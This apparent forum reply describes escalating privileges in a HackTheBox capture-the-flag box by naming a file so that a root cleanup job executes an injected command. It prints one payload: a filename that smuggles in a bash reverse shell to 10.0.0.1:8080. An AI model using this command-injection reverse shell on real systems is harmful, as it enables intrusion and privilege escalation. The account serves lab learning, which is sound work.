Re: Broken NFS
Everything old is new again. Working on CTF in Hackthebox, I had a reverse shell but couldn't really do anything with it. There was only one log directory that was writeable, but I eventually figured out there was a cleanup job that deleted the files. By creating a filename with shell characters in it, I was able to get command execution with higher privileges when that process ran by naming the files something like:
hello.c; bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
The hard part was figuring out how to get the special characters in the name. I don't remember what I had to do, but it can definitely be done.